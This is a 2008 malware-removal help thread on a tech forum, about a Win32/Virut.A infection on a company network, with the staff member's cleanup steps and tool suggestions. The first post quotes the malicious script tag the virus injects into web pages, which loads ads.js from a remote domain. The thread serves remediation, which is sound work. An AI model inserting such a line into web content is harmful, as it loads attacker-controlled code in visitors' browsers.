Win32/Virut.A Infection

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by RChicken, Mar 21, 2008.

  1. RChicken

    RChicken Private E-2

    Hello! I did do a search and read your read me's to make sure that i won't bug you with a repeat, but after all that i am still having issues. On wednesday our network got hit with the Win32/Virut.A. What is happening is that it is inserting this code "<script src="http://u.asdafdgfgf.com/ads.js"></script>" into all my browser pages. I have run Spybot, it did not remove it. I also ran AVG internet security 8, and that didn't produce any results. I used the AVG Win32/Virut removal tool, and that didn't work. Normally after this i would just give up and format the computer but this is where our bigger problem is.

    Someone on our network got this thing which in turn spread it to every computer on our network including our main data server. After looking through my event viewer i found what computer it came from and removed that computer from the network. Anyway i am running a win2k machine, but we have this virus on XP and Win2k3 Server machines. But for starters i am trying to solve the issue on a win2k machine, so here we go.

    I have attached the MGLogs.zip for you.
     

    Attached Files:

    RChicken, Mar 21, 2008
    #1
  2. Lev

    Lev MajorGeek

    Lev, Mar 21, 2008
    #2
  3. RChicken

    RChicken Private E-2

    here you go. After i ran the combo fixer and the super scanner i noticed i wasn't receive the ads.js virus message, i also had java script turned off on fire fox. but it needed the java to attach the files and as soon as i turned java on i started getting a notice again.
     

    Attached Files:

    RChicken, Mar 21, 2008
    #3
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    Infections like Virut.A which can infect all executable files can be just about impossible to reliably remove. According to Symantec:
    This comes from here: http://www.symantec.com/security_response/writeup.jsp?docid=2006-051402-1930-99&tabid=1

    None of the scans we are running are going to detect anything since the virus infects valid files. You only real possible chance of disinfection is by using an antivirus program that scans ALL files and that can repair the files that have been corrupted. If the AVG tool did not work, I'm not sure if any will. Did you run the tool in safe boot mode? Did you have it scan all drives?

    McAfee does imply that they fix it. See: http://vil.nai.com/vil/content/v_139473.htm

    I believe that many people windup finding out that the only try reliable fix for this infection is to delete, partitions, re-partition and reinstall. Backing up any data must be done very carefully since any executable type file may be infected.

    After getting all PCs fixed, you must make sure that they are all properly updated with all security patches and that they are running proper protection. Cases of infections like Virut.A demonstrate why this is critical especially in the business world.

    I see some other items we need to fix but I don't believe they are related to Virut. We can try fixing these below and I will give you a couple other scans to run in the hopes that they can help with Virut but I would not count on it.


    I don't like the looks of a driver/service I see in your logs. Can you put a copy of the below file into a ZIP file and attach it here for ffurther analysis.
    C:\WINNT\system32\XDva032.sys

    Now we need to use ComboFix to remove a bunch of malware files.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouseclick combofix's window while it is running. That may cause it to stall.

    Now run Ccleaner!

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it.

    Then attach the below logs:
    • C:\ComboFix.txt
    • C:\MGlogs.zip
    Make sure you tell me how things are working now!

    Now try giving the below tools a run and let me know if they find and remove anything:

    McAfee AVERT Stinger

    Kaspersky AVP Tool

    Trend Micro Housecall
     
    chaslang, Mar 21, 2008
    #4

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds